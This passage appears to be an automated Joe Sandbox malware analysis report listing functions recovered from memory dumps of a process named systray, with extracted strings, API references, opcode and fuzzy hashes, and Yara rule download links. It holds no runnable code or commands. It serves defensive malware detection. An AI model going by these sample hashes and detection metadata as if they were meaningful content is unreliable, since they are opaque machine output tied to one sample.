                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: 0ea673ac91f854a6d661bf05e4b10bd6ad81ffd354c53cbf73b3d84f9303f1b7
                                                                  • Instruction ID: 297280fefaab1785f0855d69b0f9f11ea0147d56a2b905d8a85588f5f14bd1a9
                                                                  • Opcode Fuzzy Hash: 0ea673ac91f854a6d661bf05e4b10bd6ad81ffd354c53cbf73b3d84f9303f1b7
                                                                  • Instruction Fuzzy Hash: A54102313047029FDB20DE29D850B6ABBE5EF88711F004A9DF99ADB290DB31F805CB91
                                                                  Function 04B0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B4728C
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 04B472C1
                                                                  • RTL: Resource at %p, xrefs: 04B472A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04B47294
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: 2eeb560cf419234c2907352f8432c6f5684b480a887dcd732406d66c27053f69
                                                                  • Instruction ID: 3ac4cc94217b24116cb6a09607d0b2ffcf44c90c100589def89616d445b62913
                                                                  • Opcode Fuzzy Hash: 2eeb560cf419234c2907352f8432c6f5684b480a887dcd732406d66c27053f69
                                                                  • Instruction Fuzzy Hash: E7413031704202AFEB20DE68CC41F6ABBA4FB85714F104699F965EB680DB21F842DBD1
                                                                  Function 04B82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: b551c87aa4c9c6ce038185e3fa37dafaaa67ad50fc2dad458e2e0f9fbd58c657
                                                                  • Instruction ID: bbca032baecf18e9657a1d4caf30ba098d69fee9d05944cf9902dd0fffcfbabe
                                                                  • Opcode Fuzzy Hash: b551c87aa4c9c6ce038185e3fa37dafaaa67ad50fc2dad458e2e0f9fbd58c657
                                                                  • Instruction Fuzzy Hash: 083157766002199FDB24EE29DD50BEEB7F8EF44754F8445D9E849E3140EB30BA44CBA1
                                                                  Function 04B17D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: df73d2861f7f8b2d5ecd0c91781c49921331d13b1610a7153d221fba09531511
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: BC919671E002599BDF24DF69C881ABFB7E5FF44720FA4459AE855E72E0EF30A9408760
                                                                  Function 04AD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: 57db71b924a5b9006e9d5bd733bfe6fe0d87a7509a30768b14813c2cb6b33ba0
                                                                  • Instruction ID: dab5f586b69d4ccb5c2e3668451a4545ed0b997f17d69d505ade6dd8256fcb37
                                                                  • Opcode Fuzzy Hash: 57db71b924a5b9006e9d5bd733bfe6fe0d87a7509a30768b14813c2cb6b33ba0
                                                                  • Instruction Fuzzy Hash: B8811BB1D012699BDB35DF54CD45BEAB7B8AF08714F0041DAA919B7250E770AE84CFA0
                                                                  Function 04B5CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 04B5CFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Dw@4Dw
                                                                  • API String ID: 4062629308-3936743583
                                                                  • Opcode ID: e9d7786f88e5ae8fe42f17d811009fc3e5a32603aea684acc712b1911b1fec77
                                                                  • Instruction ID: 67733658498de0cdb413d2893b705bb6baba3a6fd8e4a2da1f57918900c1e89f
                                                                  • Opcode Fuzzy Hash: e9d7786f88e5ae8fe42f17d811009fc3e5a32603aea684acc712b1911b1fec77
                                                                  • Instruction Fuzzy Hash: 8A41CE71900214DFDB219FA9D990BADFBB8FF48B14F0481AAED15DB260D734E800CB60
                                                                  Function 048E3A40 Relevance: 5.0, Strings: 4, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4781931793.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_48e0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9$:0=($;&5,$p|89
                                                                  • API String ID: 0-533800126
                                                                  • Opcode ID: f6665e2ec1701d8a95a60850f885a35d4fb276e81995e2f2a39c47bff9511014
                                                                  • Instruction ID: 9a2e468d707980926004b8878f3640e313616a32a512196a1a347790b81437d4
                                                                  • Opcode Fuzzy Hash: f6665e2ec1701d8a95a60850f885a35d4fb276e81995e2f2a39c47bff9511014
                                                                  • Instruction Fuzzy Hash: 08F0EC35018B844FD705AB5CC44596A77D4FBD830DF400B1EE8CACB151DA759A478B4B